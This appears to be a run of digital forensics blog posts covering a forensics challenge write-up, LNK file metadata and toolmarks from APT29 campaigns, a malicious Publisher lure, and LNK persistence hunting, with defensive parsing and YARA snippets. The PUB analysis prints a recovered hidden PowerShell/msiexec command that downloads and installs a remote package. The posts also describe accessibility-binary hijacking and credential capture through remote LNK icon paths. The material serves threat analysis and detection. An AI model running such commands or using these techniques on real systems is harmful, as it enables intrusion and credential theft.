Tuesday, January 15, 2019

Just For Fun...

OS/2 Warp running in VirtualBox
When I started graduate school in June 1994, I showed up having used Windows 3.1 and AOL for dial-up.  While in grad school, I began using SPARC systems running SunOS (the web browser was Netscape), as that was what was available in my curriculum.  I also got to interact and engage with a lot of other now-historical technology, and over time, I've had passing feelings of sentimentality and nostalgia.

After I arrived in CA, I was shown PPP/SLIP dial-up for Windows systems, and was fascinated with the configuration and use, mostly because now, I was one of the cool kids.  For a while, I dabbled with the idea of a dual degree (EE/CS; I never committed to it) and came into pretty close contact with folks from the CS department.  As it turned out, there were more than a few folks in the CS department who were interested in OS/2, including one of the professors, who had a program that would sort and optimize the boot-up sequence for OS/2 so that it would load and run faster.

Also, it didn't hurt that the grad school I attended was not far from Silicon Valley, the center of the universe for tech coolness at the time.  In fact, the EE curriculum had a class each summer called "hot chips", where we studied the latest in microprocessor technology, and which corresponded with the "Hot Chips" conference in San Jose.  The class was taught by Prof. F. Terman, the son of the other Fred Terman.

While I was in grad school, I was eventually introduced to OS/2.  I purchased a copy of OS/2 2.1 at Fry's Electronics (in Sunnyvale, next to Weird Stuff), specifically because the box came with a sticker/coupon for $15 off of OS/2 Warp 3.0.  I enjoyed working with OS/2 at the time; I could dial into my local ISP (Garlique.com at the time), connect to the school systems, and run multiple instances of MATLAB programs I'd written as part of a course.  I could then either connect later and collect the output, or simply have it available when I arrived at the school.

I had no idea at the time, but for the first four months or so that I was at NPS, I walked by Gary Kildall's office almost every day.  I never did get to see CP/M in action, but anyone who's ever used MS-DOS has interacted with a shadow of what CP/M once was and was intended to be.

While I was in grad school, I had two courses in assembly language programming, both based on the Motorola 68000, the microprocessor used in Amiga systems.  I never owned an Amiga as a kid, but while I was in grad school, there was someone in a nearby town who ran a BBS based on Amiga, and after grad school, I did see an Amiga system at a church yard sale. 

While I was in the Monterey/Carmel area of California, I also became peripherally aware of such oddities of the tech world as BeOS and NeXT.

Looking back on all this, I was active duty military at the time, and could not have afforded to pull together the various bits and pieces to lay the foundation for a future museum.  Also, for anyone familiar with the system the military uses to move service members between duty stations, such a collection likely would not have survived (ah, the stories...).  However, thanks to virtualization systems such as VirtualBox, you can now pull together a museum-on-a-hard-drive, by either downloading the virtual images, or collecting the necessary materials and installing them yourself.  As you can see from the image in this post, I found an OS/2 Warp VirtualBox image available online.  I don't do much with it, but I do remember that the web browser was the first one I encountered that would let you select an image in a web page and drag it to your desktop.  At the time, that was some pretty cool stuff!

Resources (links to instructions, not all include images or ISO files)
VirtualBox BeOS R5
VirtualBox Haiku (inspired by BeOS) images (there's also a Plan 9 image...just sayin'...)
NeXT in VirtualBox: NeXTSTEP, stuffjasondoes
Virtually Fun - CP/M-86
VirtualBox Amiga

Wednesday, January 09, 2019

A Tale of Two Analyses

I recently shared my findings from an analysis challenge that Ali posted, and after publishing my post, found out that Adam had also shared his findings.  Looking at both posts, it's clear that there are two different approaches, and as I read through Adam's findings, it occurred to me that this is an excellent example of what I've seen time and time again in the industry. 

Adam and I have never met, and I know nothing at all about his background.  I only know that Adam's blog has (at the time of this writing) a single post, from 2 Jan 2019.  On the other hand, my blogging goes back to 2004, and I've been in the industry for over 21 years, with several years of service prior to that.  All this is intended to point out that Adam and I each come to the table with a different perspective, and given the same data, will likely approach it differently.

A good deal of my experience is in the consulting arena, meaning that engagements usually start with a phone call, and in most cases, it's very likely that the folks I work with weren't the first to be called, and won't be the last.  Yes, I'm saying that in some cases, consumers of digital analysis services shop around.  This isn't a bad thing; it simply means that they're looking for the "best deal".  As such, cases are "spec'd out" based on a number of hours...not necessarily the number of hours it will take to complete the work, but rather the number of hours a customer is willing to purchase for the work they want done.  The natural outcome of this is that once the customer's questions have been established, the analyst assigned the work needs to focus on answering those questions.  Otherwise, time spent pursuing off-topic issues or "rabbit holes" increases the time it takes to complete the work, time which isn't billed to the customer.  As such, the effective hourly rate drops, and it can drop to the point where the company loses money on the work.

All of this is meant to say that without an almost pedantic focus on the questions at hand, an analyst is going to find themselves not making friends; reports won't be delivered on time, additional analysts will need to be assigned to actually complete the work, and someone may have their approved vacation rescinded (I've actually seen this happen...) in order to get the work done.

When I read the challenge, my focus was on the text that the admin saw and reported.  As such, my analysis goal, before even downloading the challenge image, was to determine the location of the file on the system, and then determine how it got there.

However, I approached Ali's first question of how the system was hacked a little differently; I've dealt with a lot of customers over two decades who've asked how something was "hacked", and I've had to keep in mind that their use of the term is different from mine.  For me, "hacked" refers to exploiting a vulnerability to gain access to a system, escalate privileges, and/or essentially take actions for which the system and data were never intended.  I didn't go into the analysis assuming that the system was "hacked"...I approached it from the perspective that the main focus of my analysis was the message that the admin had reported, and that any "hacking" of the system would be within some modicum of temporal proximity to that file being created and/or modified.  As such, a timeline was in order, and this approach helped me with question #2, regarding "evidence".  In fact, creating micro-timelines or "overlays" allowed me to target my analysis.  At one point, I created a timeline of just logon events from the Security Event Log.  In order to prove that the Administrator account was used to create the target readme.txt file, I created micro-timelines for both user profiles, using just web browser and Registry (specifically, shellbags and RecentDocs) data.
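
As an illustration of what I mean by an "overlay", a micro-timeline can be as simple as a filtered copy of the full events file.  Below is a minimal sketch in Python, assuming the five-field TLN format (time|source|system|user|description) I use for timeline data; the file name and the "EVTX" source tag are illustrative:

# Build a micro-timeline "overlay" by filtering a TLN-format events file
# (time|source|system|user|description) down to a single data source
# and/or user.  File name and source tag below are illustrative.
def micro_timeline(events_file, source=None, user=None):
    with open(events_file) as f:
        for line in f:
            fields = line.rstrip("\n").split("|")
            if len(fields) != 5:
                continue
            _, src, _, usr, desc = fields
            if source and src != source:
                continue
            if user and user.lower() not in usr.lower():
                continue
            yield line.rstrip("\n")

# Example: just the Windows Event Log entries, e.g., logon events
for entry in micro_timeline("events.txt", source="EVTX"):
    if "Security" in entry and "4624" in entry:
        print(entry)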

From my overall timeline, I found when the "C:\Tools\readme.txt" file had been created, and I then used that as a pivot point for my analysis.  This is how I arrived at the finding that the Administrator account had been used to create the file.

From my perspective, the existence of additional text files (i.e., within a folder on the "master" profile desktop), who created them and when, the modification to magnify.exe, and the system time change all fell into the same bucket for question #4 (i.e., "anything you would like to add").  All of these things fell out of the timeline rather easily, but I purposely did not pursue further analysis of things such as the execution of magnify.exe, net.exe, and net1.exe, as I had already achieved my analysis goal.

Again, in my experience as a consultant, completing analysis work within a suitable time frame (one that allows the business to achieve its margins) hinges upon a focus on the stated analysis goals.

I've seen this throughout my career...a number of years ago, I was reviewing a ransomware case as part of an incident tracking effort, and noticed in the data that the same vulnerability used to compromise the system prior to ransomware being deployed had been used previously to access the system and install a bitcoin miner.  As the customer's questions specifically focused on the ransomware, analysis of the bitcoin miner incident hadn't been pursued.  This wasn't an issue...the analyst hadn't "missed" anything.  In fact, the recommendations in the report that applied to the ransomware issue applied equally well to the bitcoin miner incident.

A Different Perspective
It would seem, from my reading (and interpretation) of Adam's findings, that his focus was more on the "hack".  Early on in his post, Adam's statement of his analysis goals corresponded very closely to my understanding of the challenge:

We are tasked with performing an IR investigation from a user who reported they've found a suspicious note on their system. We are given only the contents of the message (seen below) without its file path, and also no time at which the note was left.

...and...

Since we can understand that this note was of concern to the user, it is very important to start developing a time frame of before the note was created to understand what led to this point. This will allow the investigator to find the root cause efficiently.

Adam went on to describe analyzing shellbags artifacts, but there was no indication in his write-up that he'd done a side-by-side mapping of date/time stamps, with respect to the readme.txt file to the shellbag artifacts.  Shortly after that, the focus shifted to magnify.exe, and away from the text file in question.

Adam continued with a perspective that you don't often see in write-ups or reports; not only did he look up the hash of the file on VT, but he also demonstrated, in a virtual machine, his hypothesis regarding how magnify.exe might have been used.

In the end, however, I could not find where the question of how the "C:\Tools\readme.txt" file came to be on the system was clearly and directly addressed.  It may be there; I just couldn't find it.

Final Words
I did engage with the challenge author early this morning (9 Jan), and he shared with me the specifics of how different files (the files in a folder on one user's desktop) were created on the system.  I think that one of the major comments I shared with Ali was that not only was this challenge representative of what I've seen in the industry, but so are the shared findings.  No two analysts come to the table with the exact same experience and perspectives, and left to their own devices, no two analysts will approach and solve the same analysis (or challenge) the same way.  But this is where documentation and sharing are most valuable; by working challenges such as these, either separately or together, and then sharing our findings publicly, we can all find a way to improve every aspect of what we do.

Monday, January 07, 2019

Mystery Hacked System

Ali was gracious enough to make several of the challenges that he put together for his students available online, and to allow me to include the first challenge in IWS.  I didn't include challenge #3, the "mystery hacked system", in the book, but I did recently revisit the challenge.  Ali said that it would be fine for me to post my findings.

As you can see, the challenge is pretty straightforward...an admin found a message "written on their system", and reported it.  The questions that Ali posed for the challenge were:
  1. How was the system hacked?
  2. What evidence did you find that proved your hypothesis?
  3. How did you approach and solve the case?
  4. Anything you would like to add?
Below are my responses:

Question 1
Based on what I observed in the data, I would say that the system was not, in fact, hacked.  Rather, it appears that the Administrator user logged in from the console, accessed the C:\Tools folder and created the readme.txt file containing the message.

Question 2
I began with a visual inspection of the image, in order to verify that it could be opened, per SOP.  An initial view of the image indicated two user profiles (Administrator, master), and that there was a folder named "C:\Tools".  Within that folder was a single file named "readme.txt", which contained the text in question.

From there, I created a timeline of system activity, and started my analysis by locating the file 'C:\Tools\readme.txt' within the timeline, and I then pivoted from there.

The readme.txt file was created on 12 Dec 2015 at approx. 03:24:04 UTC.  Approx. 4 seconds later, the Automatic JumpList for Notepad within the Administrator profile was modified; at the same time, UserAssist artifacts indicated that the Administrator user launched Notepad.

At the time that the file was created, the Administrator user was logged into the system via the console.  Shellbag artifacts for the Administrator account indicated that the account was used to navigate to the 'C:\Tools' folder via Windows Explorer.

Further, there were web browser artifacts indicating that the Administrator account was used to view the file at 03:24:09 UTC on 12 Dec 2015, and that the 'master' account was used to view the file at 03:27:23 UTC on the same day.

Question 3
I created a timeline of system activity from several sources extracted from the image: file system metadata, Windows Event Log metadata, and Registry metadata.  In a few instances, I created micro-timelines of specific data sources (i.e., logon events from the Security Event Log, activity related to specific users) to use as "overlays" and make analysis easier.

Question 4
Not related to the analysis goal provided were indications that the Administrator account had been used to access the Desktop\Docs folder for the 'master' user, and to create the 'readme.txt' file in that folder.

In addition, there was a pretty significant change in the system time, as indicated by the Windows Event Log:

Fri Dec 11 17:30:37 2015 Z
  EVTX     sensei            - [Time change] Microsoft-Windows-Kernel-General/1;
                                          2015-12-11T17:30:37.456000000Z,
                                          2015-12-12T03:30:35.244496800Z,1
*Time was changed TO 2015-12-11T17:30:37 FROM 2015-12-12T03:30:35

Finally, there was some suspicious activity on 12 Dec, at 03:26:13 UTC: magnify.exe was executed, as indicated by the creation and last modification of an application prefetch file, which suggests that this may have been the first and only time that magnify.exe had been executed.

Several seconds before that, it appeared that utilman.exe had been executed, and shortly afterward, net.exe and net1.exe were executed, as well.

Concerned about an "Image File Execution Options" or accessibility hijack, I searched the rest of the timeline, and found an indication that on 11 Dec, at approx. 19:18:54 UTC, cmd.exe had been copied to magnify.exe.  This was verified by checking the file version information within magnify.exe.  Utilman.exe does not appear to have been modified, nor replaced, and the same appears to be true for osk.exe and sethc.exe.

Checking the Software hive, there do not appear to be any further "Image File Execution Options" hijacks.
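
On a live system, that check can be scripted; below is a minimal Python sketch (for an acquired Software hive, as in this case, you'd go through a hive parser such as RegRipper instead).  It enumerates the Image File Execution Options subkeys and flags any with a "Debugger" value set:

import winreg

# Enumerate Image File Execution Options subkeys and flag any with a
# "Debugger" value set (the classic accessibility tool hijack).
IFEO = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO) as key:
    subkey_count = winreg.QueryInfoKey(key)[0]
    for i in range(subkey_count):
        name = winreg.EnumKey(key, i)
        with winreg.OpenKey(key, name) as sub:
            try:
                dbg, _ = winreg.QueryValueEx(sub, "Debugger")
                print(f"{name} -> Debugger = {dbg}")
            except FileNotFoundError:
                pass  # no Debugger value; nothing hijacked here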

I should note that per the timeline, the execution of magnify.exe occurred approx. two minutes after the message file was created.

Addendum:
After I posted this article and Ali commented, I found this blog post by Adam, which also provided a solution to the challenge.  Adam had posted his solution on 2 Jan, so last week.  I have to say, it's great to see someone else working these challenges and posting their solution.  Great job, Adam, and thanks for sharing!

Addendum, 9 Jan:
On a whim, I took a look at the USN change journal, and it proved to be pretty fascinating...more so, it showed that following the use of net.exe/net1.exe, no files were apparently written to the system (i.e., no output was redirected to a file).  Very cool.

Tuesday, January 01, 2019

LNK Toolmarks, Revisited

There was a recent blog post and Twitter thread regarding the parsing and use of weaponized LNK file metadata. Based on some of what was shared during the exchange, I got to thinking about toolmarks again, and how such files might be created.  My thinking was that perhaps some insight could be gained from the format and structure of the file itself.  For example, the weaponized LNK files from the two campaigns appear to have valid structures, and there appear to have been no modifications to the LNK file structure itself.  Also, the files contained specific structures, including a PropertyStoreDataBlock and a TrackerDataBlock.  While this may not seem particularly unusual, I have seen some LNK files that do not contain these structures.  I parsed an LNK file not long ago that did not contain a TrackerDataBlock.  As such, I thought I'd look at some ways, or at least one way, to create LNK files and see what the resulting files would "look like".

Several years ago, Adam had an excellent blog post regarding LNK hotkeys; I borrowed the VBS code (other examples and code snippets can be found here and here), and made some minor tweaks.  For example, I pointed the target path to calc.exe, ran the code, and then moved the file from the Desktop to a testing folder, changing the file extension in the process.  Running my own parser against the resulting LNK file, I found that it had a valid PropertyStoreDataBlock (containing the user SID), as well as a properly structured TrackerDataBlock.

These findings coincide with what I saw when running the parser against LNK files from both the 2016 and 2018 APT29/Cozy Bear campaigns.

You can also use PowerShell to create shortcuts, using the same WScript.Shell API as the VBScript (a Python sketch of the same approach follows the links below):
Create shortcuts in PowerShell
PowerShell script to modify an LNK file (target path)
Editing shortcuts in PowerShell
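
The same WScript.Shell COM interface is also reachable from Python via pywin32; here's a minimal sketch (paths are illustrative), which should produce an LNK file with the same populated PropertyStoreDataBlock and TrackerDataBlock as the VBScript version:

import win32com.client  # pywin32

# Create a shortcut via the WScript.Shell COM object, the same API
# used by the VBScript and PowerShell examples above.
shell = win32com.client.Dispatch("WScript.Shell")
lnk = shell.CreateShortcut(r"C:\Users\Public\Desktop\foo.lnk")
lnk.TargetPath = r"C:\Windows\System32\calc.exe"
lnk.Description = "test shortcut"
lnk.Save()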

We also know that the LNK files used in those campaigns were relatively large, much larger than a 'normal' LNK file, because the logical file was extended beyond the LNK file structure to include additional payloads.  These payloads were extracted by the PowerShell commands embedded within the LNK file itself.

Felix Weyne published a blog post that discussed how to create a booby-trapped LNK file (much like those from the APT29 campaigns) via PowerShell.

So, we have a start in understanding how the LNK files may have been created.  Let's go back and take another look at the LNK files themselves.

The FireEye blog post regarding the recent phishing campaign included an operational timeline in table 1.  From that table, the "LNK weaponized" time stamp was developed (at least in part) from the last modification DOSDate time stamp for the 'system32' folder shell item within the LNK file.  What this means is that the FireEye team stripped out and used as much of the LNK file metadata as they had available.  From my perspective, this is unusual because most write-ups I've seen regarding the use of weaponized LNK files (or really, any weaponized files) tend to give only a cursory overview of or reference to the file before moving on to the payloads. Even write-ups involving weaponized Word documents make mention of the file extension, maybe give a graphic illustrating the content, and then move on.

As described by the folks at JPCERT/CC, parsing of weaponized LNK files can give us a view into the attacker's development environment.  The FireEye team illustrated some of that by digging into the individual shell items and incorporating the embedded DOSDate time stamps in their analysis, and subsequently the operational timeline they shared in their post.
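
As a quick aside, DOSDate time stamps pack a date and a time into two 16-bit values, with two-second resolution; a minimal decoder, with illustrative input values, might look like this:

from datetime import datetime

def parse_dosdate(date_word, time_word):
    # Date word: bits 0-4 day, 5-8 month, 9-15 years since 1980;
    # time word: bits 0-4 seconds/2, 5-10 minutes, 11-15 hours.
    day    =   date_word        & 0x1F
    month  =  (date_word >> 5)  & 0x0F
    year   = ((date_word >> 9)  & 0x7F) + 1980
    sec    =  (time_word        & 0x1F) * 2
    minute =  (time_word >> 5)  & 0x3F
    hour   =  (time_word >> 11) & 0x1F
    return datetime(year, month, day, hour, minute, sec)

print(parse_dosdate(0x4D8B, 0x7C21))  # 2018-12-11 15:33:02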

There's a little bit (quite literally, no pun intended...) more that we can tease out of the LNK file.  Recall the VBScript I ran to create an LNK file on my Windows 10 test system; figure 1 shows the "version" field (in the green box) for one of the shell items in the itemIDList from the resulting LNK file.

Fig. 1: Excerpt from "foo" LNK file
In figure 1, the version is "0x09", which corresponds to a Windows 10 system (see section 6.5 of Joachim Metz's Windows Shell Item format specification).

Figure 2 illustrates the shell item version value (in the red box) from the approximate corresponding location in the APT29 LNK file from the 2018 campaign.

Fig. 2: Excerpt from APT29 LNK file
In figure 2, the version field is "0x08", which corresponds to Windows 7 (as well as Windows 8.0 and Windows 2008).  It may not be a lot, but as the versions of Windows continue to progress, this will have more meaning.
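
If you want to pull that version field out programmatically rather than eyeball a hex dump, one rough approach (a sketch, not a full shell item parser) is to key off the 0xbeef0004 extension block signature; per the format specification, the two-byte version value immediately precedes the signature:

import struct

SIG = b"\x04\x00\xef\xbe"  # 0xbeef0004 extension block signature, little-endian

def shell_item_versions(lnk_path):
    data = open(lnk_path, "rb").read()
    idx = data.find(SIG)
    while idx > 1:
        # Extension block layout: size (2 bytes), version (2 bytes),
        # then the 4-byte signature; the version sits 2 bytes before it.
        yield struct.unpack_from("<H", data, idx - 2)[0]
        idx = data.find(SIG, idx + 1)

for v in shell_item_versions("foo.lnk"):
    print(hex(v))  # 0x8 -> Win7/8.0/2008; 0x9 -> Win10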

Finally, some things to consider about the weaponized LNK files...

All of the shell items in both LNK files have consistent extension blocks, which may indicate that they were created through some automated means, such as via an API, and not modified (by hand or by script) as a means of defense evasion.

So, what about that?  What is the effect on individual shell items, and on the entire LNK file, if modifications are made?  From figure 1, I modified the version value to read 0x07 instead of 0x09, and the shortcut performed as expected.  Modifications to weaponized LNK files such as these will very likely affect parsers, but for those within the community who wrote the parsers and understand the LNK file structure (along with the associated shell item structures), such things are relatively straightforward to overcome (see my previous "toolmarks" blog post).

Final Words
Using "all the parts of the buffalo", and fully exploiting the data that you have available, is the only way that you're going to develop a full intelligence picture. Some of what was discussed in this post may not be immediately useful for, say, threat hunting within an infrastructure, but it can be used to develop a better understanding of the progression of techniques employed by actors, and provide a better understanding of what to hunt for.

Additional Reference Material
Joachim Metz's Windows Shell Item format specification
Link to reported bash and C versions of a tool to create LNK files on Linux

Saturday, December 29, 2018

Parsing the Cozy Bear LNK File

November 2018 saw a Cozy Bear/APT29 campaign, discussed in FireEye's blog post regarding APT29 activity (from 19 Nov 2018), as well as in this Yoroi blog regarding the Cozy Bear campaign (from 21 Nov 2018).  I found this particular campaign a bit fascinating, as it is another example of actors sending LNK files to their target victims, LNK files that had been created on a system other than the victim's.

However, one of the better (perhaps even the best) write-ups regarding the LNK file deployed in this campaign is Oleg's description of his process for parsing that file.  His write-up is very comprehensive, so I won't steal any of his thunder by repeating it here.  Instead, I wanted to dig just a bit deeper into the LNK file structure itself.

Using my own parser, I extracted metadata from the LNK file structure for the "ds7002.lnk" file. The TrackerDataBlock includes much of the same information that Oleg uncovered, including the "machine ID", which is a 16-byte field containing the NetBIOS name of the system on which the LNK file was created:

***TrackerDataBlock***
Machine ID            : user-pc
New Droid ID Time     : Thu Oct  6 17:03:04 2016 UTC
New Droid ID Seq Num  : 13273
New Droid Node ID     : 08:00:27:92:24:e5
Birth Droid ID Time   : Thu Oct  6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID   : 08:00:27:92:24:e5

From the TrackerDataBlock, we can also see one of the MAC addresses recognized by the system.  Using the OUI lookup tool from Wireshark, we see that the OUI for the displayed MAC address points to "PcsCompu PCS Computer Systems GmbH".  From WhatsMyIP, we get "Pcs Systemtechnik Gmbh".

Further, there's a SID located in the PropertyStoreDataBlock:

***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000

Finally, there's the volume serial number embedded within the LNK file:

vol_sn             C4B2-BD1C

A combination of the volume serial number, machine ID, and the SID from the PropertyStoreDataBlock can be used to create a Yara rule, which can then be submitted as a retro-hunt on VirusTotal, in order to locate other examples of LNK files created on this system.
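
As a sketch of what such a rule might look like (shown here compiled via the yara-python bindings; the rule name is mine, the SID is assumed to be stored as a string in the property store, and the volume serial number is written as a little-endian DWORD):

import yara

RULE = r"""
rule apt29_lnk_toolmarks
{
    strings:
        $machine_id = "user-pc"    // TrackerDataBlock machine ID
        $sid = "S-1-5-21-1764276529-1526541935-4264456457-1000" ascii wide
        $vsn = { 1C BD B2 C4 }     // volume serial C4B2-BD1C, little-endian
    condition:
        uint32(0) == 0x0000004c and all of them    // 0x4c = LNK header size
}
"""

rules = yara.compile(source=RULE)
print(rules.match("ds7002.lnk"))

The rule source itself is what would be submitted for the VT retro-hunt.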

Note that the FireEye write-up mentions a previous campaign (described by Volexity) in which a similar LNK file was used.  In that case, MAC address, SID, and volume serial number were identical to the ones seen in the LNK file in the Nov 2018 campaign.  The file size was different, and the embedded PowerShell command was different, but the rest of the identifying metadata remained the same two years later.

Another aspect of the LNK file from the Nov 2018 campaign is the embedded PowerShell command.  As Oleg pointed out, the PowerShell command itself is encoded as a base64 string...or, perhaps more accurately, a "base" + 0x40 encoded string.  The manner by which commands are obfuscated can be very telling, and can perhaps even be used as a means for tracking the evolution of the technique.
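
For reference, a standard PowerShell -EncodedCommand argument is just base64 over a UTF-16LE string, so unwrapping one is trivial; a quick worked example (the sample command here is illustrative, not the one from the campaign):

import base64

# PowerShell's -EncodedCommand is base64 over a UTF-16LE string.
encoded = base64.b64encode('Write-Host "hi"'.encode("utf-16-le")).decode()
print(encoded)                                        # what you'd see embedded
print(base64.b64decode(encoded).decode("utf-16-le"))  # the recovered command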

This leads to another interesting aspect of this file; rather than using an encoded PowerShell command to download the follow-on payload(s), those payloads are included, in encoded form, within the logical body of the file itself.  The delivered LNK file is over 400K in size (the LNK file from 2016 was over 660K), which is quite unusual for such a file, particularly given that the LNK file structure itself ends at offset 0x0d94, making the LNK structure proper just 3476 bytes in size.
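
Given that the structure ends at a known offset, carving whatever was appended is about as simple as it gets; a minimal sketch, using the 0x0d94 offset noted above (the output file name is mine):

# Carve the data appended beyond the end of the LNK structure.
with open("ds7002.lnk", "rb") as f:
    data = f.read()

payload = data[0x0D94:]
print(f"{len(payload)} bytes appended beyond the LNK structure")

with open("ds7002_appended.bin", "wb") as out:
    out.write(payload)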

Oleg did a great job of walking through the collection, parsing and decoding/decryption of the embedded PDF and DLL files, as well as of writing up and sharing his process.  From a threat intel perspective, identifying information extracted from file metadata can be used to further the investigation and help build a clearer intel picture.

Addendum, 31 Dec: Here's a fascinating tweet thread regarding using DOSDate time stamps embedded in shellitems to identify "weaponization time" of the LNK file, and here's more of that conversation.

Friday, December 28, 2018

PUB File

Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before).  The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself.  MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.

Why would I bother doing this?  For one, I believe that there is a good bit of value that goes unrealized when we don't look at artifacts like this; value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.

I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.

The first thing I did was run 'strings' against the file.  Below are some of the more interesting strings I was able to find in the file:

E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar 
alabama

Document created using the application not related to Microsoft Office

For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.

"-executionpolicy bypass -noprofile -w hidden  -c & ""msiexec"" url1=gmail url2=com  /q /i http://homeofficepage[.]com/TabSvc"

Shceduled update task

One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file.  What this means is that the streams themselves are not contiguous, and that strings contained in the file may be separated across sectors.  For example, for the string "alabama" listed above, it is possible that part of the string (i.e., "ala") may exist in one sector, and the remaining portion may exist in another sector, so that searching for the full string may not find all instances of it.  Further, with the use of macros, the macros themselves are compressed, throwing another monkey wrench into string searches.
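
One way to mitigate the fragmentation issue is to search the reassembled streams rather than the raw file; the olefile Python module defragments each stream for you.  A minimal sketch (the file name comes from the path seen in the strings output; note that this still won't see inside compressed VBA macros):

import olefile

# Search each reassembled (defragmented) stream, rather than the raw
# file, so that strings split across sectors are still found.
ole = olefile.OleFileIO("1en.pub")
for stream in ole.listdir():
    data = ole.openstream(stream).read()
    if b"alabama" in data:
        print("/".join(stream), "-", len(data), "bytes")
ole.close()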

Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings.  For example, note the misspelling of "Shceduled".  This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure.  Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word.  ;-)

The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.

Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:

Root Entry  Date: 20.11.2018, 14:40:11  CLSID: 00021201-0000-0000-00C0-000000000046
    1 D..       0 20.11.2018, 14:40:11 \Objects
    2 D..       0 20.11.2018, 14:40:11 \Quill
    3 D..       0 20.11.2018, 14:40:11 \Escher
    4 D..       0 20.11.2018, 14:40:11 \VBA
    7 F..   10602                      \Contents
    8 F.T      94                      \CompObj
    9 F.T   16384                      \SummaryInformation
   10 F.T     152                      \DocumentSummaryInformation
   11 D..       0 20.11.2018, 14:40:11 \VBA\VBA
   12 D..       0 20.11.2018, 14:40:11 \VBA\crysler
   18 F..     387                      \VBA\crysler\f
   19 F..     340                      \VBA\crysler\o
   20 F.T      97                      \VBA\crysler\CompObj
   21 F..     439                      \VBA\crysler\ VBFrame
   22 F..     777                      \VBA\VBA\dir
   23 FM.    1431                      \VBA\VBA\crysler
   30 FM.    8799                      \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros.  Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can be put to use by intel analysts.

Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way.  In fact, the two visible macros are well-structured, and don't appear to do much at all; the malicious functionality appears to be embedded someplace else within the file itself.
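
For reference, the macro decompression step can also be handled programmatically; the olevba module from oletools wraps it up neatly.  A minimal sketch:

from oletools.olevba import VBA_Parser

# Decompress and dump each VBA macro stream from the file.
vba = VBA_Parser("1en.pub")
for fname, stream_path, vba_filename, vba_code in vba.extract_macros():
    print("---", stream_path, "---")
    print(vba_code)
vba.close()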

Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day.  In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information.  In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful.  Unfortunately, it's in a tweet thread and not some more permanent format.

I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents.  This includes OLE-format Word and Publisher documents, as well.  Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.

Wednesday, December 19, 2018

Hunting and Persistence

Sometimes when hunting, we need to dig a little deeper, particularly where the actor employs novel persistence mechanisms.  Persistence mechanisms that are activated by some means other than a system start or user login can be challenging for a hunter to root (pun intended) out.

During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity.  One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start. 

As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.

Sometimes, persistence mechanisms aren't all that easy or straightforward to determine, particularly if the actor established a foothold within the target infrastructure prior to instrumentation being put in place.  It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation.  The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.

One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files.  Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence.  So how does this persistence mechanism work?  Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDAV connections are initiated to the remote system.
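
A crude hunting heuristic for this technique is to sweep LNK files for icon locations that point to UNC paths.  The sketch below doesn't fully parse the LNK structure; it simply scans the raw bytes for a UTF-16LE UNC pattern, so expect false positives (a proper check would parse the IconLocation string out of the structure):

import re
from pathlib import Path

# Flag LNK files whose raw bytes contain a UTF-16LE UNC path
# (\\server\share...), a possible remote icon location.
UNC = re.compile(rb"(?:\\\x00){2}(?:[\x21-\x7e]\x00){2,}")

for lnk in Path(r"C:\Users").rglob("*.lnk"):
    try:
        data = lnk.read_bytes()
    except OSError:
        continue
    m = UNC.search(data)
    if m:
        print(lnk, "->", m.group().decode("utf-16-le"))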

Also, from here:

Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.

As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able to return to the environment following a global password change.  Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.

